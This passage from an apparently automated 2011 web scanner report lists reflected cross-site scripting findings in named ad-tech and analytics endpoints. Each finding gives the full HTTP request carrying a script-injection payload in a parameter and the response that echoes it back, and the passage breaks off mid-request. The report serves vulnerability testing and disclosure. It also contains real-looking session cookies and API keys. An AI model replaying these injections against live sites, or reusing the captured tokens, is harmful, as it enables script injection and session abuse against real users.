GET /PortalServe/?pid=1409315L44120110908171336&flash=10&time=3|13:21|-57532b'%3balert(1)//4a891d65b27&redir=http://iv.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-300/600%3B44392852/44410639/1%3B%3B%7Eokv%3D%3B%21category%3Dny%3B%21category%3Dthe-scene%3B%21category%3Dbottom%3Bsite%3Dny%3Bpid%3D%3Bsect%3Dthe-scene%3Bsub%3Dthe-scene-index%3Bsub2%3D%3Bcontentid%3D%3Bkw%3D%3BmtfIFPath%3D/includes/%3Btile%3D3%3Bpos%3D2%3Bsz%3D300x250%2C300x600%3B%21category%3Drefresh%3Brefresh%3Dtrue%3Bpm%3D1%3Blsg%3D22368%3B%7Eaopt%3D2/0/b2/0%3B%7Esscs%3D%3f$CTURL$&pos=x&dom=http://www.nbcnewyork.com&r=0.38880528369918466 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://iv.doubleclick.net/adi/nbcu.lim.ny/the-scene-index;!category=ny;!category=the-scene;!category=bottom;site=ny;pid=;sect=the-scene;sub=the-scene-index;sub2=;contentid=;kw=;mtfIFPath=/includes/;tile=3;pos=2;sz=300x250,300x600;!category=refresh;refresh=true;pm=1;lsg=22368;ord=533318422036?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; F1FuWM=4*1317839769; F1GBxd=1*1317852302; PRvt=CKJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmBbHqUAB3BAeKMrErn3uJDv8AEUBAeJP7Ern6nyhcfADrBBeJyuEro4I5LOiABWBAeKJcEro4f5YWRAMZBAe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=8EAE0400-3F59-124F-1209-1FB0026B0100; PRca=|AKoY*9320:1|AJil*562:2|AK0w*562:2|AKAH*47:1|AJrB*1871:1|AKrj*1495:1|AKmB*47:5|AJvZ*396:1|AKkS*9227:1|AKlp*1278:1|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKoYAC0U:1|AJilAAJE:2|AK0wAAJE:2|AKAHAAAl:1|AJrBAA4L:1|AKrjAAYH:1|AKmBAAAl:5|AJvZAAGY:1|AKkSACYp:1|AKlpAAUc:1|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FvLB:1|ErY8:2|Fc3m:2|GBoD:1|GBxd:1|Etx2:1|GBJ0:1|FuWM:4|EvC9:1|Fyu4:1|FsBu:1|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GXmL:1|GJup:2|GQzk:2|GKY8:1|GSVD:1|GZZh:1|GZPz:1|GZZd:2|GZZc:2|Fz04:1|GY7h:1|GWZl:1|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FvLBGXmL:1|ErY8GJup:2|Fc3mGQzk:2|GBoDGKY8:1|GBxdGZZc:1|Etx2GSVD:1|FuWMGZZh:1|GBJ0GZPz:1|FuWMGZZd:2|FuWMGZZc:1|EvC9Fz04:1|Fyu4GY7h:1|FsBuGWZl:1|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Oct 2011 18:21:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.nbcnewyork.com/includes/PointRollAds.htm?pid=1409315L44120110908171336&redir=http://iv.doubleclick.net/click%3Bh=v8/3b97/3/0/*/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-30
...[SNIP]...
e-index%3Bsub2=%3Bcontentid=%3Bkw=%3BmtfIFPath=/includes/%3Btile=3%3Bpos=2%3Bsz=300x250,300x600%3B!category=refresh%3Brefresh=true%3Bpm=1%3Blsg=22368%3B~aopt=2/0/b2/0%3B~sscs=%3F$CTURL$&time=3|13:21|-57532b';alert(1)//4a891d65b27&flash=10&server=portalserve&bu=279973245');

3.10. http://api.bizographics.com/v1/profile.json [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 785f4<script>alert(1)</script>66aad21ad39 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData785f4<script>alert(1)</script>66aad21ad39&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://online.wsj.com/public/page/0_0_WP_2300_NewsReel.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Wed, 05 Oct 2011 21:13:20 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 283
Connection: keep-alive

dj.module.ad.bio.loadBizoData785f4<script>alert(1)</script>66aad21ad39({"bizographics":{"group":{"code":"tech_business_professional","name":"Tech Business Professional"},"industry":[{"code":"software","name":"Software"}],"location":{"code":"texas","name":"USA - Texas"}},
...[SNIP]...

3.11. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload d311a<script>alert(1)</script>1d048d63422 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvund311a<script>alert(1)</script>1d048d63422 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://online.wsj.com/public/page/0_0_WP_2300_NewsReel.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 05 Oct 2011 21:13:27 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=ebdfc38c-c239-4c92-be51-9d834d35dbf2;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvund311a<script>alert(1)</script>1d048d63422)

3.12. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 659a8<script>alert(1)</script>97957b9b5b8 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5659a8<script>alert(1)</script>97957b9b5b8&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=0%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1317838668564784%26sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 05 Oct 2011 18:21:09 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=ebdfc38c-c239-4c92-be51-9d834d35dbf2;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a5659a8<script>alert(1)</script>97957b9b5b8)

3.13. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 7326d<script>alert(1)</script>eba2e7e64dc was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=7326d<script>alert(1)</script>eba2e7e64dc HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 05 Oct 2011 18:21:16 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=ebdfc38c-c239-4c92-be51-9d834d35dbf2;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: 7326d<script>alert(1)</script>eba2e7e64dc

3.14. http://api.v2.badgeville.com/api/widgets/4e261f7efffffa1312583821/thenextweb.com.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.v2.badgeville.com
Path:   /api/widgets/4e261f7efffffa1312583821/thenextweb.com.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e453e<script>alert(1)</script>91a75530fb2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/widgets/4e261f7efffffa1312583821/thenextweb.com.json?callback=Badgeville.bv_cp0e453e<script>alert(1)</script>91a75530fb2&version=v2&_=1317847267367 HTTP/1.1
Host: api.v2.badgeville.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Wed, 05 Oct 2011 20:41:25 GMT
Content-Type: text/javascript; charset=utf-8
Connection: close
Status: 200 OK
Last-Modified: Tue, 16 Aug 2011 18:14:07 GMT
X-Runtime: 0.041403
Set-Cookie: _Badgeville_session=BAh7BiIPc2Vzc2lvbl9pZCIlNDdkZjY3NDk4YTgzNGYxYmI4NzYwYjRiM2IxNGU2MzA%3D--8b852118631080b84e9d274ba37434848f105084; path=/; expires=Wed, 19-Oct-2011 20:41:25 GMT; HttpOnly
Cache-Control: max-age=0, private, must-revalidate
Content-Length: 1408

Badgeville.bv_cp0e453e<script>alert(1)</script>91a75530fb2({"data":{"pics":{"default_user_pic":"http://api.v2.badgeville.com/images/misc/missing/bar/user_nopicture.png","sample_trophy":"http://s3.amazonaws.com/badgeville-production-reward-definitions/images/4
...[SNIP]...

3.15. http://api.v2.badgeville.com/api/widgets/4e261f7efffffa1312583821/thenextweb.com/players/leaderboard.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.v2.badgeville.com
Path:   /api/widgets/4e261f7efffffa1312583821/thenextweb.com/players/leaderboard.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7b394<script>alert(1)</script>7728f0b8339 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/widgets/4e261f7efffffa1312583821/thenextweb.com/players/leaderboard.json?callback=Badgeville.bv_cp17b394<script>alert(1)</script>7728f0b8339&name=week&version=v2&disabled=false&skin=current&per_page=10&orientation=vertical&requireUser=false&foundMe=false&_=1317847269414 HTTP/1.1
Host: api.v2.badgeville.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _Badgeville_session=BAh7BiIPc2Vzc2lvbl9pZCIlNDdkZjY3NDk4YTgzNGYxYmI4NzYwYjRiM2IxNGU2MzA%3D--8b852118631080b84e9d274ba37434848f105084

Response

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Wed, 05 Oct 2011 20:41:46 GMT
Content-Type: text/javascript; charset=utf-8
Connection: close
Status: 200 OK
ETag: "cc1d433f84903555a149399ade5fcf98"
X-Runtime: 0.116828
Set-Cookie: _Badgeville_session=BAh7BiIPc2Vzc2lvbl9pZCIlY2Q4NzM5NjVjZjg3NTcxOGRkMzQyOWQwOTMzOTRjMjM%3D--42f5a63c4f36b2d90994d061fbcf8213310236fe; path=/; expires=Wed, 19-Oct-2011 20:41:46 GMT; HttpOnly
Cache-Control: max-age=0, private, must-revalidate
Content-Length: 27908

Badgeville.bv_cp17b394<script>alert(1)</script>7728f0b8339({"data":[{"leaderboards":{"week":{"label":null,"position":1,"points":1740}},"points_day":640.0,"facebook_id":null,"facebook_link":null,"last_reward":{"name":"White Belt","history":{"toast":{"4e261f5ea
...[SNIP]...

3.16. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload a284e<script>alert(1)</script>2bf29bd6e1a was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractiona284e<script>alert(1)</script>2bf29bd6e1a&n=ar_int_p91136705&1317849138654 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://view.atdmt.com/NYC/iview/309859443/direct;wi.300;hi.250/01/6156874?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/p%3B240309425%3B0-0%3B0%3B33078169%3B4307-300/250%3B41509016/41526803/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D1%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282; UIDR=1317753620; ar_p119936314=exp=2&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:32:48 2011&prad=71054949&arc=43921375&; ar_p91136705=exp=1&initExp=Wed Oct 5 21:12:09 2011&recExp=Wed Oct 5 21:12:09 2011&prad=309859443&arc=206710353&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1317849131%2E026%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 21:13:08 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractiona284e<script>alert(1)</script>2bf29bd6e1a("");

3.17. http://as.chango.com/links/adunit/1.31784957539e+12 [adpos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the adpos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a36e"><script>alert(1)</script>5f73c1757ef was submitted in the adpos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=04a36e"><script>alert(1)</script>5f73c1757ef&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "89efd49fd743ab27e4e474041a8357c453bb0966"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2227
Date: Wed, 05 Oct 2011 21:34:17 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:17 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:17 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=04a36e"><script>alert(1)</script>5f73c1757ef&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c4019354e8f499890&cu=&dsi=None&clickURL=">
...[SNIP]...

3.18. http://as.chango.com/links/adunit/1.31784957539e+12 [atype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bafe3"><script>alert(1)</script>689ab2541e9 was submitted in the atype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORICbafe3"><script>alert(1)</script>689ab2541e9&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "8b7acc5c2a50b2822a4fb378e5645327d2808ba4"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:17 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:17 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:17 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORICbafe3"><script>alert(1)</script>689ab2541e9&test=0&adpos=0&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c4019354e8f499890&cu=&dsi=None&clickURL=">
...[SNIP]...

3.19. http://as.chango.com/links/adunit/1.31784957539e+12 [bidder parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the bidder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ead"><script>alert(1)</script>17c0bcecbe5 was submitted in the bidder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west13ead"><script>alert(1)</script>17c0bcecbe5&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
